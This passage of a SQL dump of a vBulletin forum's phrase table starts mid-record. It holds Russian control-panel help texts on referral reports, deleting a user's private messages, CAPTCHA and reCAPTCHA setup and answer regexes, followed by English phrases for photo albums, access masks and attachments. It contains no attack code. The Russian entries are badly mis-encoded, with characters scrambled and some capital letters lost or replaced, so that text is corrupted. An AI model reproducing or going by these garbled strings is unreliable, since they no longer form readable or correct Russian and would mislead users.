äâóçíà÷íûé äåíü, ÷åòûðåõçíà÷íûé ãîä, äâóçíà÷íûé ÷àñ è äâóçíà÷íûå ìèíóòû. Îò÷¸ò îòîáðàçèò âñþ ðåôåððàëüíóþ èíôîðìàöèþ çà ïåðèîä ñ íà÷àëüíîé äî êîíå÷íîé äàòû.', 'vbulletin', '', 0, ''), (24893, -1, 'usertools_referrers_enddate_title', 'cphelptext', 'Êîíå÷íàÿ äàòà', 'vbulletin', '', 0, ''), (24894, -1, 'usertools_removepms_text', 'cphelptext', 'Ãàæìèòå êíîïêó \"Äà\" íèæå, ÷òîáû óäàëèòü ëè÷íûå ñîîáùåíèÿ ýòîãî ïîëüçîâàòåëÿ. Ãòà îïåðàöèÿ íåîáðàòèìà!', 'vbulletin', '', 0, ''), (24895, -1, 'usertools_removepms_title', 'cphelptext', 'Óäàëèòü ËÑ ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24896, -1, 'usertools_removesentpms_text', 'cphelptext', 'Ãàæìèòå êíîïêó \"Äà\" íèæå, ÷òîáû óäàëèòü ëè÷íûå ñîîáùåíèÿ, îòïðàâëåííûå ýòèì ïîëüçîâàòåëåì, êîòîðûå óæå íàõîäÿòñÿ â ïàïêàõ \"Âõîäÿùèå\" äðóãèõ ïîëüçîâàòåëåé. Ãòà îïåðàöèÿ íåîáðàòèìà!', 'vbulletin', '', 0, ''), (24897, -1, 'usertools_removesentpms_title', 'cphelptext', 'Óäàëèòü îòïðàâëåííûå ïîëüçîâàòåëåì ËÑ', 'vbulletin', '', 0, ''), (24898, -1, 'usertools_removesubs_text', 'cphelptext', 'Ãàæìèòå êíîïêó \"Äà\" íèæå, ÷òîáû àííóëèðîâàòü ïîäïèñêè ýòîãî ïîëüçîâàòåëÿ íà òåìû ôîðóìà.  ðåçóëüòàòå îí íå áóäåò áîëüøå ïîëó÷àòü óâåäîìëåíèÿ î íîâûõ îòâåòàõ â ïîäïèñàííûõ òåìàõ. Ãòà îïåðàöèÿ íåîáðàòèìà!', 'vbulletin', '', 0, ''), (24899, -1, 'usertools_removesubs_title', 'cphelptext', 'Àííóëèðîâàòü ïîäïèñêè ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24900, -1, 'usertools_showreferrals_text', 'cphelptext', 'Ãòî ñïèñîê âñåõ ðåôåððàëîâ ýòîãî ïîëüçîâàòåëÿ çà óêàçàííûé ïåðèîä âðåìåíè.', 'vbulletin', '', 0, ''), (24901, -1, 'usertools_showreferrals_title', 'cphelptext', 'Îòîáðàæåíèå ðåôåððàëîâ', 'vbulletin', '', 0, ''), (24902, -1, 'usertools_showreferrers_text', 'cphelptext', 'Ãòî îò÷¸ò, îòîáðàæàþùèé âñåõ ðåôåððàëîâ çà óêàçàííûé ïåðèîä âðåìåíè. Ãàæìèòå íà èìÿ ïîëüçîâàòåëÿ íèæå, ÷òîáû óâèäåòü êàæäûé ðåôåððàë äëÿ ýòîãî ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24903, -1, 'usertools_showreferrers_title', 'cphelptext', 'Îòîáðàæåíèå ðåôåððàëîâ', 'vbulletin', '', 0, ''), (24904, -1, 'verify_intro_text', 'cphelptext', '

Îòäåëåíèå ëþäåé îò ðîáîòîâ

\r\n

Ñèñòåìà îòäåëåíèÿ ëþäåé îò ðîáîòîâ ñîçäàíà äëÿ òîãî, ÷òîáû ïðåäîòâðàòèòü (èëè õîòÿ áû îãðàíè÷èòü) àâòîìàòè÷åñêóþ ðàññûëêó ñïàìà ïî ôîðóìàì.

\r\n

Îíà ïðîñèò âûïîëíèòü ïðîñòóþ äëÿ ëþäåé çàäà÷ó, íî ïðè ýòîì êîìïüþòåðàì äëÿ âûïîëíåíèÿ òàêîé çàäà÷è ïîòðåáóåòñÿ ïðîâåñòè áîëüøèå è ñëîæíûå âû÷èñëåíèÿ.

', 'vbulletin', 'zCarot', 1205929568, '3.7.0 Release Candidate 1'), (24905, -1, 'verify_intro_title', 'cphelptext', 'Ãàñòðîéêè îòäåëåíèÿ ëþäåé îò ðîáîòîâ', 'vbulletin', 'zCarot', 1205929568, '3.7.0 Release Candidate 1'), (24906, -1, 'verify_intro_hv_recaptcha_privatekey_text', 'cphelptext', '×òîáû èñïîëüçîâàòü ñåðâèñ reCAPTCHA™, âàì íåîáõîäèìî çàðåãèñòðèðîâàòüñÿ íà recaptcha.net. Ãîñëå ðåãèñòðàöèè âû ïîëó÷èòå äâà êëþ÷à: ïóáëè÷íûé è ëè÷íûé. Çäåñü âàì íóæíî ââåñòè ëè÷íûé êëþ÷ reCAPTCHA™.', 'vbulletin', 'zCarot', 1208796155, '3.7.0 Release Candidate 4'), (24907, -1, 'verify_intro_hv_recaptcha_privatekey_title', 'cphelptext', 'Ëè÷íûé êëþ÷ reCAPTCHA™', 'vbulletin', 'zCarot', 1208796155, '3.7.0 Release Candidate 4'), (24908, -1, 'verify_intro_hv_recaptcha_publickey_text', 'cphelptext', '×òîáû èñïîëüçîâàòü ñåðâèñ reCAPTCHA™, âàì íåîáõîäèìî çàðåãèñòðèðîâàòüñÿ íà recaptcha.net. Ãîñëå ðåãèñòðàöèè âû ïîëó÷èòå äâà êëþ÷à: ïóáëè÷íûé è ëè÷íûé. Çäåñü âàì íóæíî ââåñòè ïóáëè÷íûé êëþ÷ reCAPTCHA™.', 'vbulletin', 'zCarot', 1208796122, '3.7.0 Release Candidate 4'), (24909, -1, 'verify_intro_hv_recaptcha_publickey_title', 'cphelptext', 'Ãóáëè÷íûé êëþ÷ reCAPTCHA™', 'vbulletin', 'zCarot', 1208796122, '3.7.0 Release Candidate 4'), (24910, -1, 'verify_intro_hv_recaptcha_theme_text', 'cphelptext', 'reCAPTCHA™ ïðåäîñòàâëÿåò íåñêîëüêî ñòèëåé. Ãòîò ïàðàìåòð ïîçâîëÿåò âûáðàòü ñòèëü, êîòîðûé âû æåëàåòå èñïîëüçîâàòü íà äàííîì ôîðóìå.', 'vbulletin', 'zCarot', 1208796230, '3.7.0 Release Candidate 4'), (24911, -1, 'verify_intro_hv_recaptcha_theme_title', 'cphelptext', 'Ñòèëü reCAPTCHA™', 'vbulletin', 'zCarot', 1208796230, '3.7.0 Release Candidate 4'), (24912, -1, 'verify_intro_hv_type_text', 'cphelptext', '

Ãðîâåðêà èçîáðàæåíèåì

\r\n

Ãðè ïðîâåðêå èçîáðàæåíèåì áóäåò ñãåíåðèðîâàíî èçîáðàæåíèå, ñîäåðæàùåå íàáîð èñêàæ¸ííûõ ÷èñåë è ëàòèíñêèõ áóêâ, êîòîðûå ïîëüçîâàòåëü äîëæåí ðàñïîçíàòü è îòïðàâèòü ñèñòåìå äëÿ ñðàâíåíèÿ. Äëÿ ïîääåðæêè äàííîé ôóíêöèè òðåáóåòñÿ ëèáî áèáëèîòåêà GD2, ëèáî ImageMagick. Ãòî êëàññè÷åñêèé âàðèàíò, êîòîðûé ïðèâû÷åí äëÿ áîëüøèíñòâà ïîëüçîâàòåëåé. Ìèíóñîì ÿâëÿåòñÿ òî, ÷òî ïîëüçîâàòåëè, çàáëîêèðîâàâøèå îòîáðàæåíèå èçîáðàæåíèé, íå ñìîãóò ïðîéòè äàííóþ ïðîâåðêó.

\r\n\r\n

Ãðîâåðêà âîïðîñîì è îòâåòîì

\r\n

Ãðîâåðêà âîïðîñîì è îòâåòîì âûáèðàåò ñëó÷àéíûé âîïðîñ èç ïðåäóñòàíîâëåííîãî ñïèñêà è îæèäàåò îòâåòà, ñîîòâåòñòâóþùåãî ñïèñêó äîïóñòèìûõ îòâåòîâ íà êîíêðåòíûé âîïðîñ. Ãòî ïîçâîëÿåò çàäàòü ñïåöèôè÷åñêèå äëÿ âàøåãî ôîðóìà âîïðîñà, òåì ñàìûì ïðåäîòâðàòèâ âîçìîæíîñòü îáõîäà çàùèòû, ïóò¸ì çíàíèÿ òèïîâûõ âîïðîñîâ è îòâåòîâ äëÿ áîëüøîãî êîëè÷åñòâà ôîðóìîâ vBulletin. Ãîæàëóéñòà, óñòàíàâëèâàéòå òîëüêî òå âîïðîñû, íà êîòîðûå ñìîæåò îòâåòèòü ëþáîé (äàæå íà÷èíàþùèé) ïîëüçîâàòåëü èíòåðíåòà.

\r\n\r\nÃðîâåðêà ñåðâèñîì reCAPTCHA™

\r\n

Ñåðâèñ reCAPCTHA™ ïðåäîñòàâëÿåò ñîáñòâåííûé ñåðâèñ ïðîâåðêè èçîáðàæåíèåì. Ãîëüçîâàòåëü äîëæåí áóäåò ââåñòè äâà ðàçìûòûõ ñëîâà. Äàííûé ñåðâèñ äà¸ò âîçìîæíîñòü ïðîñëóøàòü àóäèî ôðàãìåíò ñ íóæíûì òåêñòîì.

', 'vbulletin', 'zCarot', 1205930139, '3.7.0 Release Candidate 1'), (24913, -1, 'verify_intro_hv_type_title', 'cphelptext', 'Ãèáëèîòåêà îòäåëåíèÿ ëþäåé îò ðîáîòîâ', 'vbulletin', 'zCarot', 1205929473, '3.7.0 Release Candidate 1'), (24914, -1, 'verify_intro_regimagetype_text', 'cphelptext', '

Äëÿ ãåíåðàöèè èçîáðàæåíèé ôîðóìó òðåáóåòñÿ ñïåöèàëüíàÿ áèáëèîòåêà äëÿ îáðàáîòêè èçîáðàæåíèé. Ãà äàííûé ìîìåíò vBulletin ïîääåðæèâàåò äâå áèáëèîòåêè: GD è ImageMagick.

\r\n\r\n

Èç ýòèõ äâóõ, áîëåå ïðåäïî÷òèòåëüíîé ÿâëÿåòñÿ ImageMagick, íî ÷òîáû èñïîëüçîâàòü åãî, âàì ñëåäóåò óáåäèòüñÿ, ÷òî îí óñòàíîâëåí íà âàøåì ñåðâåðå (à ýòî áûâàåò âåñüìà ðåäêî).

\r\n\r\n

Åñëè âû âèäèòå îáà âàðèàíòà èçîáðàæåíèé, ñîçäàííûå êàê ñ ïîìîùüþ GD, òàê è ñ ïîìîùüþ ImageMagick, òî âû ìîæåòå âûáðàòü îäíó èç íèõ ñàìîñòîÿòåëüíî.

\r\n\r\n

Åñëè âû íå âèäèòå èçîáðàæåíèÿ, ñîçäàííîãî ñ ïîìîùüþ ImageMagick, òî ýòî ìîæåò îçíà÷àòü îäíî èç äâóõ: ëèáî ImageMagick íå óñòàíîâëåí íà ñåðâåðå, ëèáî âû ââåëè íåâåðíûé ïóòü ê èñïîëíÿåìûì ôàéëàì ImageMagick â âàøèõ íàñòðîéêàõ èçîáðàæåíèé.

', 'vbulletin', 'zCarot', 1208657709, '3.7.0 Release Candidate 4'), (24915, -1, 'verify_intro_regimagetype_title', 'cphelptext', 'Ãèáëèîòåêà èçîáðàæåíèé äëÿ ïðîâåðîê', 'vbulletin', 'zCarot', 1205930455, '3.7.0 Release Candidate 1'), (24916, -1, 'verify_intro_regimageoption_text', 'cphelptext', '

Ôîðóì äà¸ò âîçìîæíîñòü óêàçàòü ñëîæíîñòü ãåíåðèðóåìûõ èçîáðàæåíèé äëÿ ïðîâåðêè.

\r\n\r\n

×åì áîëüøå îïöèé âû âûáåðèòå, òåì ñëîæíåå áóäåò îòîáðàæàòüñÿ òåêñò íà èçîáðàæåíèè. Ãòî óñëîæíèò ðàáîòó äëÿ ðîáîòîâ, íî ïðè ýòîì ëþäÿì òîæå ïðèä¸òñÿ ñèëüíåå ïðèñìàòðèâàòüñÿ ê èçîáðàæåíèÿì. Åñòü âåðîÿòíîñòü, ÷òî òåêñò âîîáùå áóäåò íåâîçìîæíî ïðî÷åñòü.

\r\n\r\n

×òîáû îïðåäåëèòü ïîäõîäÿùóþ ñëîæíîñòü èçîáðàæåíèé ïîýêñïåðèìåíòèðóéòå ñ äàííûìè íàñòðîéêàìè, ïðîáóÿ ñàìîñòîÿòåëüíî ðàñïîçíàòü òåêñò.

\r\n\r\n

Ãîäñêàçêà: ïîñëå ñîõðàíåíèÿ èçìåíåíèé ñòðàíèöà ïåðåçàãðóçèòñÿ è ïðèìåð äëÿ ïàðàìåòðà \"Ãèáëèîòåêà èçîáðàæåíèé äëÿ ïðîâåðîê\" îáíîâèòñÿ, îòîáðàæàÿ òåêñò ñ óêàçàííûìè âàìè çäåñü óñëîâèÿìè.

', 'vbulletin', 'zCarot', 1205932621, '3.7.0 Release Candidate 1'), (24917, -1, 'verify_intro_regimageoption_title', 'cphelptext', 'Îïöèè èçîáðàæåíèé äëÿ ïðîâåðîê', 'vbulletin', 'zCarot', 1205932491, '3.7.0 Release Candidate 1'), (24918, -1, 'verify_modifyanswer_answer_text', 'cphelptext', 'Îòâåò íà âîïðîñ, êîòîðûé áóäåò ñ÷èòàòüñÿ âåðíûì. Îòâåò, äàííûé ïîëüçîâàòåëåì, äîëæåí ÒÎ×ÃÃŽ ñîâïàäàòü ñ óêàçàííûì âàìè çäåñü, ïîýòîìó âû ìîæåòå â âîïðîñå ïîðåêîìåíäîâàòü íàïèñàòü îòâåò ïîëíîñòüþ çàãëàâíûìè èëè, íàîáîðîò, ñòðî÷íûìè áóêâàìè, ÷òîáû íå áûëî ïðîáëåì ñ ðåãèñòðîì.', 'vbulletin', 'zCarot', 1192812015, '3.7.0 Beta 1'), (24919, -1, 'verify_modifyanswer_answer_title', 'cphelptext', 'Îòâåò', 'vbulletin', 'zCarot', 1192812015, '3.7.0 Beta 1'), (24920, -1, 'verify_modifyquestion_question_text', 'cphelptext', 'Äëÿ ïðîâåðêè ïîëüçîâàòåëÿ áóäåò çàäàí âîïðîñ, âûáðàííûé ñëó÷àéíî èç ñïèñêà âîïðîñîâ, ïðåäóñòàíîâëåííûõ âàìè. Ãîëüçîâàòåëü äîëæåí îòâåòèòü íà âîïðîñ òàê, ÷òîáû îòâåò òî÷íî ñîâïàäàë ñ òåìè âàðèàíòàìè îòâåòà, êîòîðûå âû ïðèêðåïèòå ê ýòîìó âîïðîñó.  ñëó÷àå íåïðàâèëüíîãî îòâåòà ïîëüçîâàòåëþ ïðåäëîæàò îòâåòèòü çàíîâî, íî ïðè ýòîì áóäåò âûáðàí ñëó÷àéíûì îáðàçîì íîâûé âîïðîñ.', 'vbulletin', 'zCarot', 1192811060, '3.7.0 Beta 1'), (24921, -1, 'verify_modifyquestion_question_title', 'cphelptext', 'Âîïðîñ', 'vbulletin', 'zCarot', 1192811060, '3.7.0 Beta 1'), (24922, -1, 'verify_modifyquestion_regex_text', 'cphelptext', 'Âû ìîæåòå óêàçàòü ðåãóëÿðíîå âûðàæåíèå, êîòîðîìó äîëæåí ñîîòâåòñòâîâàòü îòâåò.  ýòîì ñëó÷àå âû ìîæåòå íå óêàçûâàòü îòâåòû íà âîïðîñ - ïîäîéä¸ò ëþáîé, êîòîðûé áóäåò ñîîòâåòñòâîâàòü ýòîìó ðåãóëÿðíîìó âûðàæåíèþ.\r\n

\r\n(ÃÃ¥ íà÷èíàéòå è íå çàêàí÷èâàéòå âûðàæåíèå ýêðàíèðóþùèì ñèìâîëîì)
\r\n
\r\nÃðèìåðû:

\r\n^[A-Z]+$ - òîëüêî ñèìâîëû A-Z
\r\n^[A-Z ]+$ - òîëüêî ñèìâîëû A-Z è ïðîáåë
\r\n^[A-Z0-9 ]+$ - çàãëàâíûå ëàòèíñêèå áóêâû, öèôðû è ïðîáåë
\r\n^[A-ZÀ-ߨ0-9 ]+$ - çàãëàâíûå ëàòèíñêèå è êèðèëëè÷åñêèå áóêâû, öèôðû è ïðîáåë
\r\n^[\\x20-\\x7E]+$ - ñèìâîëû ASCII îò 32 äî 127
\r\n
\r\nÄëÿ ïîëó÷åíèÿ áîëüøåé èíôîðìàöèè î ðåãóëÿðíûõ âûðàæåíèÿõ èçó÷èòå äîêóìåíòàöèþ íà PHP.net.', 'vbulletin', 'zCarot', 1192811889, '3.7.0 Beta 1'), (24923, -1, 'verify_modifyquestion_regex_title', 'cphelptext', 'Ãåãóëÿðíîå âûðàæåíèå', 'vbulletin', 'zCarot', 1192811889, '3.7.0 Beta 1'), (32389, -1, 'access_denied', 'accessmask', 'Access Denied', 'vbulletin', '', 0, ''), (32390, -1, 'access_denied_x_users', 'accessmask', 'Access Denied: {1} User(s)', 'vbulletin', '', 0, ''), (32391, -1, 'access_granted', 'accessmask', 'Access Granted', 'vbulletin', '', 0, ''), (32392, -1, 'access_granted_x_users', 'accessmask', 'Access Granted: {1} User(s)', 'vbulletin', '', 0, ''), (32393, -1, 'access_mask_manager', 'accessmask', 'Access Mask Manager', 'vbulletin', '', 0, ''), (32394, -1, 'access_masks_quick_editor', 'accessmask', 'Access Masks Quick Editor', 'vbulletin', '', 0, ''), (32395, -1, 'delete_all_access_masks', 'accessmask', 'Delete All Access Masks', 'vbulletin', '', 0, ''), (32396, -1, 'display_all_users', 'accessmask', 'Display All Users', 'vbulletin', '', 0, ''), (32397, -1, 'display_users', 'accessmask', 'Display Users', 'vbulletin', '', 0, ''), (32398, -1, 'sort', 'accessmask', 'Sort', 'vbulletin', '', 0, ''), (32399, -1, 'user_forum_access_for_x', 'accessmask', 'User Forum Access for {1}', 'vbulletin', '', 0, ''), (32400, -1, 'add_album', 'album', 'Add Album', 'vbulletin', 'vBulletin Solutions', 1192531424, '3.7.0 Beta 1'), (32401, -1, 'add_picture_to_groups', 'album', 'Add Picture to Groups', 'vbulletin', 'vBulletin Solutions', 1201002563, '3.7.0 Beta 5'), (32402, -1, 'add_pictures', 'album', 'Add Pictures', 'vbulletin', 'vBulletin Solutions', 1195470092, '3.7.0 Beta 1'), (32403, -1, 'add_pictures_to_a_group', 'album', 'Add Pictures to a Group', 'vbulletin', 'vBulletin Solutions', 1195493521, '3.7.0 Beta 1'), (32404, -1, 'add_selected_pictures_to', 'album', 'Add selected pictures to', 'vbulletin', 'vBulletin Solutions', 1195493476, '3.7.0 Beta 1'), (32405, -1, 'add_to_group', 'album', 'Add to Group', 'vbulletin', 'vBulletin Solutions', 1195493558, '3.7.0 Beta 1'), (32406, -1, 'album', 'album', 'Album', 'vbulletin', 'vBulletin Solutions', 1192530723, '3.7.0 Beta 1'), (32407, -1, 'album_pictures_used_profile_styling', 'album', 'This album has pictures used for profile styling. Removing the album or making it non-public will remove this styling!', 'vbulletin', 'vBulletin Solutions', 1193411773, '3.7.0 Beta 1'), (32408, -1, 'album_title', 'album', 'Album Title', 'vbulletin', 'vBulletin Solutions', 1192533749, '3.7.0 Beta 1'), (32409, -1, 'album_type', 'album', 'Album Type', 'vbulletin', 'vBulletin Solutions', 1198108111, '3.7.0 Beta 4'), (32410, -1, 'approve_this_picture', 'album', 'Approve this picture', 'vbulletin', 'vBulletin Solutions', 1203554248, '3.7.0 Beta 6'), (32411, -1, 'bb_code', 'album', 'BB Code', 'vbulletin', 'vBulletin Solutions', 1204135862, '3.7.0 Beta 6'), (32412, -1, 'caption', 'album', 'Caption', 'vbulletin', 'vBulletin Solutions', 1192532629, '3.7.0 Beta 1'), (32413, -1, 'click_here_add_album_upload_pictures', 'album', 'Click here to add an album and start uploading pictures!', 'vbulletin', 'vBulletin Solutions', 1192533965, '3.7.0 Beta 1'), (32414, -1, 'click_here_to_upload_pictures', 'album', 'Click here to upload pictures!', 'vbulletin', 'vBulletin Solutions', 1192533884, '3.7.0 Beta 1'), (32415, -1, 'create_new_album', 'album', 'Create New Album', 'vbulletin', 'vBulletin Solutions', 1217341454, '3.8.0 Alpha 1'), (32416, -1, 'delete_album', 'album', 'Delete Album', 'vbulletin', 'vBulletin Solutions', 1192533522, '3.7.0 Beta 1'), (32417, -1, 'delete_this_picture', 'album', 'Delete this picture', 'vbulletin', 'vBulletin Solutions', 1192532653, '3.7.0 Beta 1'), (32418, -1, 'description', 'album', 'Description', 'vbulletin', 'vBulletin Solutions', 1192533599, '3.7.0 Beta 1'), (32419, -1, 'edit_album', 'album', 'Edit Album', 'vbulletin', 'vBulletin Solutions', 1192531965, '3.7.0 Beta 1'), (32420, -1, 'edit_picture', 'album', 'Edit Picture', 'vbulletin', 'vBulletin Solutions', 1192532499, '3.7.0 Beta 1'), (32421, -1, 'edit_picture_comment', 'album', 'Edit Picture Comment', 'vbulletin', 'vBulletin Solutions', 1200331275, '3.7.0 Beta 4'), (32422, -1, 'edit_pictures', 'album', 'Edit Pictures', 'vbulletin', 'vBulletin Solutions', 1192532034, '3.7.0 Beta 1'), (32423, -1, 'first_picture', 'album', 'First Picture', 'vbulletin', 'vBulletin Solutions', 1192713017, '3.7.0 Beta 1'), (32424, -1, 'groups', 'album', 'Groups', 'vbulletin', 'vBulletin Solutions', 1195493418, '3.7.0 Beta 1'), (32425, -1, 'last_picture', 'album', 'Last Picture', 'vbulletin', 'vBulletin Solutions', 1192533689, '3.7.0 Beta 1'), (32426, -1, 'leave_cover_unchanged', 'album', 'Leave cover unchanged', 'vbulletin', 'vBulletin Solutions', 1192532728, '3.7.0 Beta 1'), (32427, -1, 'max_file_size_per_picture', 'album', 'Maximum File Size per Picture', 'vbulletin', 'vBulletin Solutions', 1192534262, '3.7.0 Beta 1'), (32428, -1, 'max_picture_dimensions', 'album', 'Maximum Picture Dimensions', 'vbulletin', 'vBulletin Solutions', 1192534283, '3.7.0 Beta 1'), (32429, -1, 'move_to_album', 'album', 'Move to album', 'vbulletin', 'vBulletin Solutions', 1215599625, '3.8.0 Alpha 1'), (32430, -1, 'next_picture', 'album', 'Next Picture »', 'vbulletin', 'vBulletin Solutions', 1192712995, '3.7.0 Beta 1'), (32431, -1, 'note_comment_may_be_visible_locations', 'album', '(Note: your comment may be visible in alternative locations)', 'vbulletin', 'vBulletin Solutions', 1209736511, '3.7.1'), (32432, -1, 'only_report_inappropriate_pictures', 'album', 'Note: This is ONLY to be used to report inappropriate pictures.', 'vbulletin', 'vBulletin Solutions', 1196420463, '3.7.0 Beta 1'), (32433, -1, 'overview', 'album', 'Overview', 'vbulletin', 'vBulletin Solutions', 1217239246, '3.8.0 Alpha 1'), (32434, -1, 'picture', 'album', 'Picture', 'vbulletin', 'vBulletin Solutions', 1192530764, '3.7.0 Beta 1'), (32435, -1, 'picture_added', 'album', 'Picture Added', 'vbulletin', 'vBulletin Solutions', 1192532546, '3.7.0 Beta 1'), (32436, -1, 'picture_by', 'album', 'Picture By', 'vbulletin', 'vBulletin Solutions', 1195559251, '3.7.0 Beta 1'), (32437, -1, 'picture_limits', 'album', 'Picture Limits', 'vbulletin', 'vBulletin Solutions', 1192534159, '3.7.0 Beta 1'), (32438, -1, 'picture_moderated', 'album', 'Moderated', 'vbulletin', 'vBulletin Solutions', 1203642569, '3.7.0 Beta 6'), (32439, -1, 'picture_moderation_enabled', 'album', 'Moderation Enabled
Your pictures will not be visible until approved by a moderator.', 'vbulletin', 'vBulletin Solutions', 1203550244, '3.7.0 Beta 6'), (32440, -1, 'picture_url', 'album', 'Picture URL', 'vbulletin', 'vBulletin Solutions', 1204135852, '3.7.0 Beta 6'), (32441, -1, 'picture_waiting_moderator_approval', 'album', 'Picture Waiting Moderator Approval', 'vbulletin', 'vBulletin Solutions', 1203641767, '3.7.0 Beta 6'), (32442, -1, 'picture_x_of_y_from_album_z', 'album', 'Picture {1} of {2} from Album {3}', 'vbulletin', 'vBulletin Solutions', 1192710080, '3.7.0 Beta 1'), (32443, -1, 'pictured_used_profile_styling', 'album', 'This picture is used for profile styling', 'vbulletin', 'vBulletin Solutions', 1193411834, '3.7.0 Beta 1'), (32444, -1, 'pictures', 'album', 'Pictures', 'vbulletin', 'vBulletin Solutions', 1192533645, '3.7.0 Beta 1'), (32445, -1, 'pictures_automatically_resized_better_manually', 'album', 'Pictures will be automatically resized to fit within these constraints if possible. However, you may receive better results by doing it manually.', 'vbulletin', 'vBulletin Solutions', 1201613829, '3.7.0 Beta 5'), (32446, -1, 'pictures_from_this_private_album', 'album', '(Pictures from this private album will be viewable to all group members)', 'vbulletin', 'vBulletin Solutions', 1198785753, '3.7.0 Beta 4'), (32447, -1, 'pictures_remaining', 'album', 'Pictures Remaining', 'vbulletin', 'vBulletin Solutions', 1192534189, '3.7.0 Beta 1'), (32448, -1, 'pictures_to_upload', 'album', 'Pictures to Upload', 'vbulletin', 'vBulletin Solutions', 1192534104, '3.7.0 Beta 1'), (32449, -1, 'post_comment', 'album', 'Post Comment', 'vbulletin', 'vBulletin Solutions', 1200331342, '3.7.0 Beta 4'), (32450, -1, 'post_new_picture_comment', 'album', 'Post New Picture Comment', 'vbulletin', 'vBulletin Solutions', 1200331294, '3.7.0 Beta 4'), (32451, -1, 'previous_picture', 'album', '« Previous Picture', 'vbulletin', 'vBulletin Solutions', 1192712958, '3.7.0 Beta 1'), (32452, -1, 'private_album_paren', 'album', '(Private Album)', 'vbulletin', 'vBulletin Solutions', 1198185391, '3.7.0 Beta 4'), (32453, -1, 'private_only_visible_contacts_moderators', 'album', 'Private - Only visible to contacts and moderators', 'vbulletin', 'vBulletin Solutions', 1198107885, '3.7.0 Beta 4'), (32454, -1, 'profile_album_paren', 'album', '(Profile Album)', 'vbulletin', 'vBulletin Solutions', 1198185409, '3.7.0 Beta 4'), (32455, -1, 'profile_pictures_modify_profile_style', 'album', 'Profile - Pictures used to modify your profile style', 'vbulletin', 'vBulletin Solutions', 1198107956, '3.7.0 Beta 4'), (32456, -1, 'public', 'album', 'Public', 'vbulletin', 'vBulletin Solutions', 1198108101, '3.7.0 Beta 4'), (32457, -1, 'recently_updated_albums', 'album', 'Recently Updated Albums', 'vbulletin', 'vBulletin Solutions', 1217239179, '3.8.0 Alpha 1'), (32458, -1, 'report_picture', 'album', 'Report Picture', 'vbulletin', 'vBulletin Solutions', 1196158776, '3.7.0 Beta 1'), (32459, -1, 'report_picture_comment', 'album', 'Report Picture Comment', 'vbulletin', 'vBulletin Solutions', 1200332722, '3.7.0 Beta 4'), (32460, -1, 'space_remaining', 'album', 'Space Remaining', 'vbulletin', 'vBulletin Solutions', 1192534204, '3.7.0 Beta 1'), (32461, -1, 'this_album_has_no_pictures', 'album', 'This album does not have any pictures.', 'vbulletin', 'vBulletin Solutions', 1192533910, '3.7.0 Beta 1'), (32462, -1, 'this_is_album_cover', 'album', 'This is the album cover', 'vbulletin', 'vBulletin Solutions', 1192532682, '3.7.0 Beta 1'), (32463, -1, 'this_user_has_no_albums', 'album', 'This user does not have any albums to display.', 'vbulletin', 'vBulletin Solutions', 1192533987, '3.7.0 Beta 1'), (32464, -1, 'to_delete_this_album', 'album', 'To delete this album, click this box and press the \'Delete Album\' button', 'vbulletin', 'vBulletin Solutions', 1192533552, '3.7.0 Beta 1'), (32465, -1, 'unlimited', 'album', 'Unlimited', 'vbulletin', 'vBulletin Solutions', 1192531739, '3.7.0 Beta 1'), (32466, -1, 'upload_pictures', 'album', 'Upload Pictures', 'vbulletin', 'vBulletin Solutions', 1192531767, '3.7.0 Beta 1'), (32467, -1, 'view_picture', 'album', 'View Picture', 'vbulletin', 'vBulletin Solutions', 1192706392, '3.7.0 Beta 1'), (32468, -1, 'view_pictures', 'album', 'View Pictures', 'vbulletin', 'vBulletin Solutions', 1195470147, '3.7.0 Beta 1'), (32469, -1, 'x_by_y_pixels', 'album', '{1} by {2} Pixels', 'vbulletin', 'vBulletin Solutions', 1192534408, '3.7.0 Beta 1'), (32470, -1, 'x_unread', 'album', '{1} unread', 'vbulletin', 'vBulletin Solutions', 1200331418, '3.7.0 Beta 4'), (32471, -1, 'xs_album_y', 'album', '{1}\'s Album: {2}', 'vbulletin', 'vBulletin Solutions', 1192532313, '3.7.0 Beta 1'), (32472, -1, 'xs_albums', 'album', '{1}\'s Albums', 'vbulletin', 'vBulletin Solutions', 1192531196, '3.7.0 Beta 1'), (32473, -1, 'add_a_single_avatar', 'attachment_image', 'Add a Single Avatar', 'vbulletin', '', 0, ''), (32474, -1, 'add_a_single_post_icon', 'attachment_image', 'Add a Single Post Icon', 'vbulletin', '', 0, ''), (32475, -1, 'add_a_single_smilie', 'attachment_image', 'Add a Single Smilie', 'vbulletin', '', 0, ''), (32476, -1, 'add_avatar', 'attachment_image', 'Add Avatar', 'vbulletin', '', 0, ''), (32477, -1, 'add_avatars', 'attachment_image', 'Add Avatars', 'vbulletin', '', 0, ''), (32478, -1, 'add_multiple_avatars', 'attachment_image', 'Add Multiple Avatars', 'vbulletin', '', 0, ''), (32479, -1, 'add_multiple_post_icons', 'attachment_image', 'Add Multiple Post Icons', 'vbulletin', '', 0, ''), (32480, -1, 'add_multiple_smilies', 'attachment_image', 'Add Multiple Smilies', 'vbulletin', '', 0, ''), (32481, -1, 'add_new_attachment_type', 'attachment_image', 'Add New Attachment Type', 'vbulletin', '', 0, ''), (32482, -1, 'add_new_avatar_category', 'attachment_image', 'Add New Avatar Category', 'vbulletin', '', 0, ''), (32483, -1, 'add_new_extension', 'attachment_image', 'Add New Extension', 'vbulletin', '', 0, ''), (32484, -1, 'add_new_post_icon_category', 'attachment_image', 'Add New Post Icon Category', 'vbulletin', '', 0, ''), (32485, -1, 'add_new_smilie_category', 'attachment_image', 'Add New Smilie Category', 'vbulletin', '', 0, ''), (32486, -1, 'add_post_icon', 'attachment_image', 'Add Post Icon', 'vbulletin', '', 0, ''), (32487, -1, 'add_post_icons', 'attachment_image', 'Add Post Icons', 'vbulletin', '', 0, ''), (32488, -1, 'add_smilie', 'attachment_image', 'Add Smilie', 'vbulletin', '', 0, ''), (32489, -1, 'add_smilies', 'attachment_image', 'Add Smilies', 'vbulletin', '', 0, ''), (32490, -1, 'adding_multiple_avatars_reading_from_x', 'attachment_image', 'Adding Multiple Avatars
